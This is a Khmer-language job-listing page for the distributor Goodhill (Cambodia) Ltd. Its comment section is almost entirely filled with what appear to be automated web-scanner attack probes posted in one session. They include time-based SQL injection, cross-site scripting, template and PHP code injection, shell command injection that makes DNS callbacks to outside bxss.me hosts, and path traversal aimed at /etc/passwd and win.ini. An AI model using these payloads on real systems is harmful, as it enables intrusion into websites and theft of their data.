ថ្ងៃទី 14 - 15 ខែ វិច្ឆិកា ឆ្នាំ 2020 ក្រសួងការងារ និងបណ្តុះបណ្តាលវិជ្ជាជីវៈ

សហគ្រាស ហ្គូដហៀល កម្ពុជា

Goodhill (Cambodia) LTD. (ហ្គូដហៀល)គឺជាក្រុមហ៊ុនដែលមានប្រតិបត្តិការនៅប្រទេសសិង្ហបុរីប្រទេសម៉ាឡេស៊ី ប្រទេសកម្ពុជា​ និងប្រទេសចិន។ បច្ចុប្បន្ននេះយើងជាអ្នកចែកចាយផ្តាច់មុខនូវម៉ាកអន្តរជាតិជាច្រើនពីដៃគូអាជីវកម្មរួមមាន Procter និង Gamble, Perfetti Van Melle, Fonterra, Philips Lighting, Hager, Castrol, Ricoh, Pilot, Staedtler និង Asia Pulp និងក្រដាស។​ 

ដើម្បីដាក់ពាក្យធ្វើការ សូមផ្ញើCV មកកាន់​ Email: recruitment@goodhill.com.kh

ទំនាក់ទំនងមកកាន់ 011 555 937 / 069 705 688


ដាក់ពាក្យស្មើសុំការងារ (CV)!

ចំនួន CV ដែលបានដាក់ពាក្យរួច 49

សូមរៀបចំ CV ជាទម្រង់ Microsoft Word, PDF ឬជារូបភាព JPG។ ទំហំមិនធំជាង 5MB។


តម្រូវការជ្រើសរើសកម្លាំងពលកម្ម សរុប 66 កន្លែង

   
សំណួរ ចម្លើយ ឬ មតិយោបល់ ទៅក្រុមហ៊ុន

 • pHqghUme

  2021-05-06 08:43:00


  @@2w3wh


 • pHqghUme

  2021-05-06 08:42:56


  1'"


 • pHqghUme

  2021-05-06 08:42:55


  1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'


 • pHqghUme

  2021-05-06 08:42:33


  1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)


 • pHqghUme

  2021-05-06 08:42:11


  tzPxMXAL')) OR 752=(SELECT 752 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:41:52


  9rjCJzyh') OR 734=(SELECT 734 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:41:30


  IL56Vgiz' OR 351=(SELECT 351 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:41:09


  -1)) OR 39=(SELECT 39 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:40:48


  -5) OR 127=(SELECT 127 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:40:27


  -5 OR 776=(SELECT 776 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:40:00


  13kCV3k1'; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 08:39:39


  1 waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 08:39:18


  -1); waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 08:38:57


  -1; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 08:38:37


  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/


 • pHqghUme

  2021-05-06 08:38:19


  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z


 • pHqghUme

  2021-05-06 08:37:57


  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z


 • pHqghUme

  2021-05-06 08:37:38


  if(now()=sysdate(),sleep(15),0)


 • pHqghUme

  2021-05-06 08:37:22


  -1' OR 2+865-865-1=0+0+0+1 or 'ql5GmCRm'='


 • pHqghUme

  2021-05-06 08:37:22


  -1" OR 2+605-605-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 08:37:21


  -1' OR 2+565-565-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 08:37:20


  -1 OR 2+532-532-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 08:37:20


  -1 OR 2+441-441-1=0+0+0+1


 • pHqghUme

  2021-05-06 08:37:19


  EkEByc4J


 • pHqghUme

  2021-05-06 08:36:53


  1


 • pHqghUme

  2021-05-06 08:36:34


  1


 • @@lG8ZH

  2021-05-06 08:36:17


  1


 • 1'"

  2021-05-06 08:36:12


  1


 • pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  2021-05-06 08:36:08


  1


 • eAB0PSHA')) OR 545=(SELECT 545 FROM PG_SLEEP(15))--

  2021-05-06 08:35:49


  1


 • fuCTwOET') OR 345=(SELECT 345 FROM PG_SLEEP(15))--

  2021-05-06 08:35:29


  1


 • HOIF8Ifd' OR 280=(SELECT 280 FROM PG_SLEEP(15))--

  2021-05-06 08:35:10


  1


 • leRVZBBB'; waitfor delay '0:0:15' --

  2021-05-06 08:34:50


  1


 • 1 waitfor delay '0:0:15' --

  2021-05-06 08:34:32


  1


 • (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  2021-05-06 08:34:16


  1


 • 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

  2021-05-06 08:33:57


  1


 • 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

  2021-05-06 08:33:38


  1


 • if(now()=sysdate(),sleep(15),0)

  2021-05-06 08:33:22


  1


 • -1" OR 2+116-116-1=0+0+0+1 --

  2021-05-06 08:33:07


  1


 • -1' OR 2+52-52-1=0+0+0+1 or 'tQyhctrj'='

  2021-05-06 08:33:06


  1


 • -1 OR 2+500-500-1=0+0+0+1

  2021-05-06 08:33:05


  1


 • -1' OR 2+11-11-1=0+0+0+1 --

  2021-05-06 08:33:05


  1


 • -1 OR 2+843-843-1=0+0+0+1 --

  2021-05-06 08:33:04


  1


 • FHlCvA3r

  2021-05-06 08:33:03


  1


 • pHqghUme

  2021-05-06 08:32:46


  1


 • pHqghUme

  2021-05-06 08:32:25


  1


 • pHqghUme

  2021-05-06 08:32:05


  1


 • pHqghUme

  2021-05-06 08:32:01


  1


 • pHqghUme

  2021-05-06 08:32:00


  1


 • pHqghUme

  2021-05-06 08:31:42


  1


 • pHqghUme

  2021-05-06 08:31:19


  1


 • pHqghUme

  2021-05-06 08:30:54


  1


 • pHqghUme

  2021-05-06 08:30:30


  1


 • pHqghUme

  2021-05-06 08:29:44


  1


 • pHqghUme

  2021-05-06 08:29:15


  1


 • pHqghUme

  2021-05-06 08:28:49


  1


 • pHqghUme

  2021-05-06 08:28:20


  1


 • pHqghUme

  2021-05-06 08:27:55


  1


 • pHqghUme

  2021-05-06 08:27:30


  1


 • pHqghUme

  2021-05-06 08:27:30


  1


 • pHqghUme

  2021-05-06 08:27:29


  1


 • pHqghUme

  2021-05-06 08:27:29


  1


 • pHqghUme

  2021-05-06 08:27:28


  1


 • pHqghUme

  2021-05-06 08:27:27


  1


 • pHqghUme

  2021-05-06 08:27:13


  1<CE6QuB<


 • pHqghUme

  2021-05-06 08:27:08


  1<img sRc='http://attacker-9994/log.php?


 • pHqghUme

  2021-05-06 08:27:04


  1<ItSkGK x=9779>


 • pHqghUme

  2021-05-06 08:27:01


  1


 • pHqghUme

  2021-05-06 08:26:55


  1<ifRAme sRc=9897.com></IfRamE>


 • pHqghUme

  2021-05-06 08:26:48


  1<WN570F>7JN5A[!+!]</WN570F>


 • pHqghUme

  2021-05-06 08:26:43


  1COn3T <ScRiPt >tlaG(9617)</ScRiPt>


 • pHqghUme

  2021-05-06 08:26:37


  1<% contenteditable onresize=tlaG(9937)>


 • pHqghUme

  2021-05-06 08:26:36


  1


 • pHqghUme

  2021-05-06 08:26:31


  1}body{acu:Expre/**/SSion(tlaG(9173))}


 • pHqghUme

  2021-05-06 08:26:22


  <a HrEF=jaVaScRiPT:>


 • pHqghUme

  2021-05-06 08:26:16


  <a HrEF=http://xss.bxss.me></a>


 • pHqghUme

  2021-05-06 08:26:13


  1


 • pHqghUme

  2021-05-06 08:26:09


  1


 • pHqghUme

  2021-05-06 08:26:08


  1


 • pHqghUme

  2021-05-06 08:26:07


  1<input autofocus onfocus=tlaG(9206)>


 • pHqghUme

  2021-05-06 08:25:58


  1&lt;ScRiPt&gt;tlaG(9674)&lt;/sCripT&gt;


 • pHqghUme

  2021-05-06 08:25:51


  1\u003CScRiPt\tlaG(9108)\u003C/sCripT\u003E


 • pHqghUme

  2021-05-06 08:25:48


  1


 • pHqghUme

  2021-05-06 08:25:45


  %31%3C%53%63%52%69%50%74%20%3E%74%6C%61%47%289216%29%3C%2F%73%43%72%69%70%54%3E


 • pHqghUme

  2021-05-06 08:25:40


  1<img/src=">" onerror=alert(9794)>


 • pHqghUme

  2021-05-06 08:25:33


  1<img src=xyz OnErRor=tlaG(9845)>


 • pHqghUme

  2021-05-06 08:25:26


  1<img src=//xss.bxss.me/t/dot.gif onload=tlaG(9561)>


 • pHqghUme

  2021-05-06 08:25:23


  1


 • pHqghUme

  2021-05-06 08:25:17


  1<body onload=tlaG(9208)>


 • pHqghUme

  2021-05-06 08:25:10


  1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9425'>


 • pHqghUme

  2021-05-06 08:25:03


  1


 • pHqghUme

  2021-05-06 08:25:01


  1<isindex type=image src=1 onerror=tlaG(9846)>


 • pHqghUme

  2021-05-06 08:24:46


  1<ScRiPt >tlaG(9530)</ScRiPt>


 • pHqghUme

  2021-05-06 08:24:42


  1


 • pHqghUme

  2021-05-06 08:24:39


  1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9924></ScRiPt>


 • pHqghUme

  2021-05-06 08:24:30


  1<ScRiPt >tlaG(9445)</ScRiPt>


 • pHqghUme

  2021-05-06 08:24:23


  1


 • pHqghUme

  2021-05-06 08:24:20


  1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%74%6C%61%47%28%39%30%30%34%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E


 • pHqghUme

  2021-05-06 08:24:15


  1<script>tlaG(9000)</script>


 • pHqghUme

  2021-05-06 08:24:07


  1<WRCSIN>ALT50[!+!]</WRCSIN>


 • pHqghUme

  2021-05-06 08:24:02


  1<ScRiPt >tlaG(9431)</ScRiPt>


 • pHqghUme

  2021-05-06 08:24:00


  1


 • pHqghUme

  2021-05-06 08:23:55


  "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")


 • pHqghUme

  2021-05-06 08:23:46


  acx__${98991*97996}__::.x


 • pHqghUme

  2021-05-06 08:23:43


  1


 • pHqghUme

  2021-05-06 08:23:39


  acx[[${98991*97996}]]xca


 • pHqghUme

  2021-05-06 08:23:34


  acx{{98991*97996}}xca


 • pHqghUme

  2021-05-06 08:23:25


  1


 • pHqghUme

  2021-05-06 08:23:25


  1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 08:23:18


  <th:t="${acx}#foreach


 • pHqghUme

  2021-05-06 08:23:11


  <%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 08:23:06


  1


 • pHqghUme

  2021-05-06 08:23:00


  acux5674%C0%BEz1%C0%BCz2a%90bcxuca5674


 • pHqghUme

  2021-05-06 08:22:54


  acu4101%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca4101


 • pHqghUme

  2021-05-06 08:22:48


  1


 • pHqghUme

  2021-05-06 08:22:47


  1


 • pHqghUme

  2021-05-06 08:22:46


  19666625


 • pHqghUme

  2021-05-06 08:22:45


  1


 • pHqghUme

  2021-05-06 08:22:44


  1


 • pHqghUme

  2021-05-06 08:22:44


  1


 • pHqghUme

  2021-05-06 08:22:43


  1


 • pHqghUme

  2021-05-06 08:22:39


  '"()&%<acx><ScRiPt >tlaG(9249)</ScRiPt>


 • pHqghUme

  2021-05-06 08:22:33


  1'"()&%<acx><ScRiPt >tlaG(9605)</ScRiPt>


 • pHqghUme<lwtwVk<

  2021-05-06 08:22:24


  1


 • pHqghUme

  2021-05-06 08:22:20


  1


 • pHqghUme<img sRc='http://attacker-9232/log.php?

  2021-05-06 08:22:17


  1


 • pHqghUme<4JLAk4 x=9813>

  2021-05-06 08:22:07


  1


 • pHqghUme<ifRAme sRc=9606.com></IfRamE>

  2021-05-06 08:21:58


  1


 • pHqghUme

  2021-05-06 08:21:54


  1


 • pHqghUme<WMK5S3>DEUX3[!+!]</WMK5S3>

  2021-05-06 08:21:52


  1


 • pHqghUme3xHNQ <ScRiPt >tlaG(9232)</ScRiPt>

  2021-05-06 08:21:46


  1


 • pHqghUme<% contenteditable onresize=tlaG(9595)>

  2021-05-06 08:21:41


  1


 • pHqghUme}body{acu:Expre/**/SSion(tlaG(9275))}

  2021-05-06 08:21:32


  1


 • <a HrEF=jaVaScRiPT:>

  2021-05-06 08:21:22


  1


 • <a HrEF=http://xss.bxss.me></a>

  2021-05-06 08:21:12


  1


 • pHqghUme<input autofocus onfocus=tlaG(9571)>

  2021-05-06 08:21:06


  1


 • pHqghUme&lt;ScRiPt&gt;tlaG(9990)&lt;/sCripT&gt;

  2021-05-06 08:20:51


  1


 • pHqghUme\u003CScRiPt\tlaG(9245)\u003C/sCripT\u003E

  2021-05-06 08:20:41


  1


 • %70%48%71%67%68%55%6D%65%3C%53%63%52%69%50%74%20%3E%74%6C%61%47%289886%29%3C%2F%73%43%72%69%70%54%3E

  2021-05-06 08:20:33


  1


 • pHqghUme<img/src=">" onerror=alert(9148)>

  2021-05-06 08:20:27


  1


 • pHqghUme<img src=xyz OnErRor=tlaG(9238)>

  2021-05-06 08:20:18


  1


 • pHqghUme<img src=//xss.bxss.me/t/dot.gif onload=tlaG(9489)>

  2021-05-06 08:20:11


  1


 • pHqghUme<body onload=tlaG(9487)>

  2021-05-06 08:20:03


  1


 • pHqghUme<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9833'>

  2021-05-06 08:19:51


  1


 • pHqghUme<isindex type=image src=1 onerror=tlaG(9098)>

  2021-05-06 08:19:43


  1


 • pHqghUme<ScRiPt >tlaG(9166)</ScRiPt>

  2021-05-06 08:19:31


  1


 • pHqghUme<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9896></ScRiPt>

  2021-05-06 08:19:26


  1


 • pHqghUme<ScRiPt >tlaG(9992)</ScRiPt>

  2021-05-06 08:19:18


  1


 • pHqghUme%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%74%6C%61%47%28%39%36%39%31%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

  2021-05-06 08:19:12


  1


 • pHqghUme<script>tlaG(9756)</script>

  2021-05-06 08:19:06


  1


 • pHqghUme<WRGJUO>LJCBX[!+!]</WRGJUO>

  2021-05-06 08:19:00


  1


 • pHqghUme<ScRiPt >tlaG(9557)</ScRiPt>

  2021-05-06 08:18:54


  1


 • "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

  2021-05-06 08:18:47


  1


 • acx__${98991*97996}__::.x

  2021-05-06 08:18:40


  1


 • acx[[${98991*97996}]]xca

  2021-05-06 08:18:30


  1


 • acx{{98991*97996}}xca

  2021-05-06 08:18:22


  1


 • 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

  2021-05-06 08:18:11


  1


 • <th:t="${acx}#foreach

  2021-05-06 08:18:05


  1


 • <%={{={@{#{${acx}}%>

  2021-05-06 08:17:56


  1


 • acux8349%C0%BEz1%C0%BCz2a%90bcxuca8349

  2021-05-06 08:17:50


  1


 • pHqghUme

  2021-05-06 08:17:47


  1


 • acu6117%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca6117

  2021-05-06 08:17:45


  1


 • pHqghUme9892268

  2021-05-06 08:17:36


  1


 • '"()&%<acx><ScRiPt >tlaG(9680)</ScRiPt>

  2021-05-06 08:17:30


  1


 • pHqghUme

  2021-05-06 08:17:25


  1


 • pHqghUme'"()&%<acx><ScRiPt >tlaG(9048)</ScRiPt>

  2021-05-06 08:17:21


  1


 • pHqghUme

  2021-05-06 08:17:10


  1


 • pHqghUme

  2021-05-06 08:17:04


  1


 • pHqghUme

  2021-05-06 08:16:57


  1


 • pHqghUme

  2021-05-06 08:16:48


  1


 • pHqghUme

  2021-05-06 08:16:41


  1


 • pHqghUme

  2021-05-06 08:16:37


  ${@print(md5(31337))}\


 • pHqghUme

  2021-05-06 08:16:37


  '.print(md5(31337)).'


 • pHqghUme

  2021-05-06 08:16:36


  ${@print(md5(31337))}


 • pHqghUme

  2021-05-06 08:16:35


  ";print(md5(31337));$a="


 • pHqghUme

  2021-05-06 08:16:34


  1


 • pHqghUme

  2021-05-06 08:16:34


  ';print(md5(31337));$a='


 • pHqghUme

  2021-05-06 08:16:33


  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));


 • '.print(md5(31337)).'

  2021-05-06 08:16:32


  1


 • pHqghUme

  2021-05-06 08:16:30


  <!--


 • ${@print(md5(31337))}\

  2021-05-06 08:16:30


  1


 • ";print(md5(31337));$a="

  2021-05-06 08:16:29


  1


 • ${@print(md5(31337))}

  2021-05-06 08:16:29


  1


 • ';print(md5(31337));$a='

  2021-05-06 08:16:28


  1


 • pHqghUme

  2021-05-06 08:16:28


  '"


 • '"

  2021-05-06 08:16:27


  1


 • ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

  2021-05-06 08:16:27


  1


 • <!--

  2021-05-06 08:16:27


  1


 • pHqghUme

  2021-05-06 08:16:26


  1


 • pHqghUme

  2021-05-06 08:16:26


  1


 • pHqghUme

  2021-05-06 08:16:26


  1


 • pHqghUme

  2021-05-06 08:16:26


  1


 • pHqghUme

  2021-05-06 08:16:25


  `(nslookup hitzldrkbfbrhf3271.bxss.me||perl -e "gethostbyname('hitzldrkbfbrhf3271.bxss.me')")`


 • pHqghUme

  2021-05-06 08:16:25


  1


 • pHqghUme

  2021-05-06 08:16:25


  1


 • pHqghUme

  2021-05-06 08:16:25


  1


 • /xfs.bxss.me

  2021-05-06 08:16:24


  1


 • pHqghUme

  2021-05-06 08:16:24


  |(nslookup hittqzthftrrb66470.bxss.me||perl -e "gethostbyname('hittqzthftrrb66470.bxss.me')")


 • pHqghUme

  2021-05-06 08:16:24


  1


 • pHqghUme

  2021-05-06 08:16:24


  1


 • pHqghUme

  2021-05-06 08:16:24


  /xfs.bxss.me


 • pHqghUme

  2021-05-06 08:16:23


  1


 • pHqghUme

  2021-05-06 08:16:23


  1


 • pHqghUme

  2021-05-06 08:16:22


  1


 • pHqghUme

  2021-05-06 08:16:22


  1


 • pHqghUme

  2021-05-06 08:16:22


  1


 • pHqghUme

  2021-05-06 08:16:21


  1


 • pHqghUme

  2021-05-06 08:16:21


  '+'A'.concat(70-3).concat(22*4).concat(111).concat(81).concat(99).concat(74)+(require'socket' Socket.gethostbyname('hitmy'+'mkaiqfsf4e978.bxss.me.')[3].to_s)+'


 • pHqghUme

  2021-05-06 08:16:20


  HttP://bxss.me/t/xss.html?%00


 • pHqghUme

  2021-05-06 08:16:20


  (nslookup hitfdofypgczi72060.bxss.me||perl -e "gethostbyname('hitfdofypgczi72060.bxss.me')")


 • pHqghUme

  2021-05-06 08:16:20


  1


 • pHqghUme

  2021-05-06 08:16:20


  "+"A".concat(70-3).concat(22*4).concat(108).concat(86).concat(105).concat(87)+(require"socket" Socket.gethostbyname("hitju"+"pdanvxxf03380.bxss.me.")[3].to_s)+"


 • pHqghUme

  2021-05-06 08:16:20


  $(nslookup hitjkqpazxhdo780f9.bxss.me||perl -e "gethostbyname('hitjkqpazxhdo780f9.bxss.me')")


 • pHqghUme

  2021-05-06 08:16:20


  bxss.me/t/xss.html?%00


 • bxss.me/t/xss.html?%00

  2021-05-06 08:16:19


  1


 • pHqghUme

  2021-05-06 08:16:19


  |echo jshupg$()\ lacyqg\nz^xyu||a #' |echo jshupg$()\ lacyqg\nz^xyu||a #|" |echo jshupg$()\ lacyqg\nz^xyu||a #


 • pHqghUme

  2021-05-06 08:16:19


  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))


 • pHqghUme

  2021-05-06 08:16:19


  1


 • '+'A'.concat(70-3).concat(22*4).concat(113).concat(77).concat(107).concat(77)+(require'socket' Socket.gethostbyname('hithh'+'zmrgqorp73475.bxss.me.')[3].to_s)+'

  2021-05-06 08:16:19


  1


 • pHqghUme

  2021-05-06 08:16:18


  1


 • HttP://bxss.me/t/xss.html?%00

  2021-05-06 08:16:18


  1


 • pHqghUme

  2021-05-06 08:16:18


  &echo yivbpc$()\ ewgtge\nz^xyu||a #' &echo yivbpc$()\ ewgtge\nz^xyu||a #|" &echo yivbpc$()\ ewgtge\nz^xyu||a #


 • )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

  2021-05-06 08:16:18


  1


 • pHqghUme

  2021-05-06 08:16:18


  1


 • "+"A".concat(70-3).concat(22*4).concat(99).concat(88).concat(103).concat(74)+(require"socket" Socket.gethostbyname("hitxh"+"ikgbvhyeeb141.bxss.me.")[3].to_s)+"

  2021-05-06 08:16:18


  1


 • pHqghUme

  2021-05-06 08:16:17


  1


 • pHqghUme

  2021-05-06 08:16:17


  1


 • pHqghUme

  2021-05-06 08:16:17


  1


 • pHqghUme

  2021-05-06 08:16:17


  echo iqlbev$()\ jcngyd\nz^xyu||a #' &echo iqlbev$()\ jcngyd\nz^xyu||a #|" &echo iqlbev$()\ jcngyd\nz^xyu||a #


 • pHqghUme

  2021-05-06 08:16:16


  12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡


 • pHqghUme

  2021-05-06 08:16:16


  1


 • pHqghUme

  2021-05-06 08:16:16


  1


 • pHqghUme

  2021-05-06 08:16:16


  1


 • pHqghUme

  2021-05-06 08:16:15


  1


 • pHqghUme

  2021-05-06 08:16:15


  1


 • pHqghUme

  2021-05-06 08:16:14


  1


 • `(nslookup hitwegsazhxwda7467.bxss.me||perl -e "gethostbyname('hitwegsazhxwda7467.bxss.me')")`

  2021-05-06 08:16:13


  1


 • pHqghUme

  2021-05-06 08:16:13


  '"()


 • |(nslookup hitereiziyarp43424.bxss.me||perl -e "gethostbyname('hitereiziyarp43424.bxss.me')")

  2021-05-06 08:16:12


  1


 • pHqghUme

  2021-05-06 08:16:11


  bxss.me


 • pHqghUme

  2021-05-06 08:16:11


  1&n995887=v954806


 • pHqghUme

  2021-05-06 08:16:10


  http://bxss.me/t/fit.txt%3F.jpg


 • pHqghUme

  2021-05-06 08:16:10


  ^(#$!@#$)(()))******


 • pHqghUme

  2021-05-06 08:16:09


  )


 • pHqghUme

  2021-05-06 08:16:09


  Http://bxss.me/t/fit.txt


 • '"()

  2021-05-06 08:16:09


  1


 • pHqghUme

  2021-05-06 08:16:09


  !(()&&!|*|*|


 • pHqghUme

  2021-05-06 08:16:08


  http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg


 • pHqghUme

  2021-05-06 08:16:08


  ".gethostbyname(lc("hitue"."ljtkvrku436ea.bxss.me."))."A".chr(67).chr(hex("58")).chr(119).chr(86).chr(113).chr(84)."


 • ^(#$!@#$)(()))******

  2021-05-06 08:16:08


  1


 • $(nslookup hitmbzpzxxxvn51557.bxss.me||perl -e "gethostbyname('hitmbzpzxxxvn51557.bxss.me')")

  2021-05-06 08:16:08


  1


 • pHqghUme

  2021-05-06 08:16:08


  1some_inexistent_file_with_long_name%00.jpg


 • )

  2021-05-06 08:16:07


  1


 • |echo neilef$()\ cevsgo\nz^xyu||a #' |echo neilef$()\ cevsgo\nz^xyu||a #|" |echo neilef$()\ cevsgo\nz^xyu||a #

  2021-05-06 08:16:07


  1


 • bxss.me

  2021-05-06 08:16:07


  1


 • pHqghUme

  2021-05-06 08:16:07


  '.gethostbyname(lc('hitct'.'phnjrufsf0b22.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(83).chr(109).chr(80).'


 • !(()&&!|*|*|

  2021-05-06 08:16:07


  1


 • (nslookup hitlqgsgznjek5cb6b.bxss.me||perl -e "gethostbyname('hitlqgsgznjek5cb6b.bxss.me')")

  2021-05-06 08:16:07


  1


 • &echo dcdruz$()\ yepgbx\nz^xyu||a #' &echo dcdruz$()\ yepgbx\nz^xyu||a #|" &echo dcdruz$()\ yepgbx\nz^xyu||a #

  2021-05-06 08:16:06


  1


 • pHqghUme

  2021-05-06 08:16:06


  1


 • pHqghUme

  2021-05-06 08:16:06


  1


 • http://bxss.me/t/fit.txt%3F.jpg

  2021-05-06 08:16:06


  1


 • ".gethostbyname(lc("hitao"."upiwdgma9d5ca.bxss.me."))."A".chr(67).chr(hex("58")).chr(122).chr(79).chr(98).chr(88)."

  2021-05-06 08:16:06


  1


 • pHqghUme

  2021-05-06 08:16:05


  1


 • Http://bxss.me/t/fit.txt

  2021-05-06 08:16:05


  1


 • '.gethostbyname(lc('hitva'.'dctgdapy49fdd.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(80).chr(116).chr(81).'

  2021-05-06 08:16:05


  1


 • pHqghUme&n995165=v955054

  2021-05-06 08:16:05


  1


 • pHqghUme

  2021-05-06 08:16:04


  1


 • 1some_inexistent_file_with_long_name%00.jpg

  2021-05-06 08:16:04


  1


 • pHqghUme

  2021-05-06 08:16:04


  1


 • 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

  2021-05-06 08:16:04


  1


 • echo ckzgeo$()\ dwdmpp\nz^xyu||a #' &echo ckzgeo$()\ dwdmpp\nz^xyu||a #|" &echo ckzgeo$()\ dwdmpp\nz^xyu||a #

  2021-05-06 08:16:04


  1


 • pHqghUme

  2021-05-06 08:16:03


  1


 • pHqghUme

  2021-05-06 08:16:03


  1


 • http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

  2021-05-06 08:16:03


  1


 • pHqghUme

  2021-05-06 08:16:02


  1


 • pHqghUme

  2021-05-06 08:16:02


  1


 • pHqghUme

  2021-05-06 08:16:02


  1


 • pHqghUme

  2021-05-06 08:16:02


  1


 • pHqghUme

  2021-05-06 08:16:01


  1


 • pHqghUme

  2021-05-06 08:16:01


  1


 • pHqghUme

  2021-05-06 08:16:01


  1


 • pHqghUme

  2021-05-06 08:16:00


  1


 • pHqghUme

  2021-05-06 08:16:00


  1


 • pHqghUme

  2021-05-06 08:15:59


  1


 • pHqghUme

  2021-05-06 08:15:59


  1


 • pHqghUme

  2021-05-06 08:15:59


  1


 • pHqghUme

  2021-05-06 08:15:58


  1


 • pHqghUme

  2021-05-06 08:15:57


  1


 • pHqghUme

  2021-05-06 08:15:56


  ../1


 • pHqghUme

  2021-05-06 08:15:56


  1


 • pHqghUme

  2021-05-06 08:15:55


  1


 • pHqghUme

  2021-05-06 08:15:55


  1


 • pHqghUme

  2021-05-06 08:15:55


  1


 • pHqghUme

  2021-05-06 08:15:55


  1


 • pHqghUme

  2021-05-06 08:15:54


  ../../../../../../../../../../../../../../windows/win.ini


 • pHqghUme

  2021-05-06 08:15:54


  1


 • pHqghUme

  2021-05-06 08:15:54


  1


 • pHqghUme

  2021-05-06 08:15:53


  ../../../../../../../../../../../../../../etc/passwd


 • pHqghUme

  2021-05-06 08:15:53


  1


 • pHqghUme

  2021-05-06 08:15:53


  1


 • pHqghUme

  2021-05-06 08:15:53


  1


 • pHqghUme

  2021-05-06 08:15:52


  1


 • pHqghUme

  2021-05-06 08:15:52


  1


 • ../pHqghUme

  2021-05-06 08:15:52


  1


 • pHqghUme

  2021-05-06 08:15:52


  1


 • ../../../../../../../../../../../../../../windows/win.ini

  2021-05-06 08:15:51


  1


 • ../../../../../../../../../../../../../../etc/passwd

  2021-05-06 08:15:50


  1


 • pHqghUme

  2021-05-06 08:15:49


  1


 • pHqghUme

  2021-05-06 08:15:48


  1


 • pHqghUme

  2021-05-06 08:15:48


  1


 • cEVYTDV2RVQ=

  2021-05-06 08:15:48


  1


 • pHqghUme

  2021-05-06 08:15:47


  1


 • pHqghUme

  2021-05-06 08:15:47


  1


 • pHqghUme

  2021-05-06 08:15:46


  ${9999418+9999837}


 • pHqghUme

  2021-05-06 08:15:46


  1


 • pHqghUme

  2021-05-06 08:15:45


  1


 • pHqghUme

  2021-05-06 08:15:45


  1


 • pHqghUme

  2021-05-06 08:15:45


  1<esi:include src="http://bxss.me/rpb.png"/>


 • pHqghUme

  2021-05-06 08:15:45


  1


 • ${9999844+9999448}

  2021-05-06 08:15:45


  1


 • pHqghUme

  2021-05-06 08:15:45


  1


 • pHqghUme<esi:include src="http://bxss.me/rpb.png"/>

  2021-05-06 08:15:44


  1


 • pHqghUme

  2021-05-06 08:15:44


  1


 • pHqghUme

  2021-05-06 08:15:44


  1


 • pHqghUme

  2021-05-06 08:15:43


  1


 • pHqghUme

  2021-05-06 08:15:43


  1


 • pHqghUme

  2021-05-06 08:15:43


  1


 • pHqghUme

  2021-05-06 08:15:42


  1


 • pHqghUme

  2021-05-06 08:15:42


  1


 • pHqghUme

  2021-05-06 08:15:41


  1


 • pHqghUme

  2021-05-06 08:15:41


  1


 • pHqghUme

  2021-05-06 08:15:40


  1


 • pHqghUme

  2021-05-06 08:15:38


  1


 • pHqghUme

  2021-05-06 08:15:38


  VHhzg4Ab


 • pHqghUme

  2021-05-06 08:15:37


  '+response.write(9062937*9932499)+'


 • pHqghUme

  2021-05-06 08:15:37


  1


 • pHqghUme

  2021-05-06 08:15:37


  1


 • pHqghUme

  2021-05-06 08:15:37


  1


 • fQ6cUTCf

  2021-05-06 08:15:37


  1


 • pHqghUme

  2021-05-06 08:15:37


  "+response.write(9062937*9932499)+"


 • pHqghUme

  2021-05-06 08:15:36


  1


 • pHqghUme

  2021-05-06 08:15:36


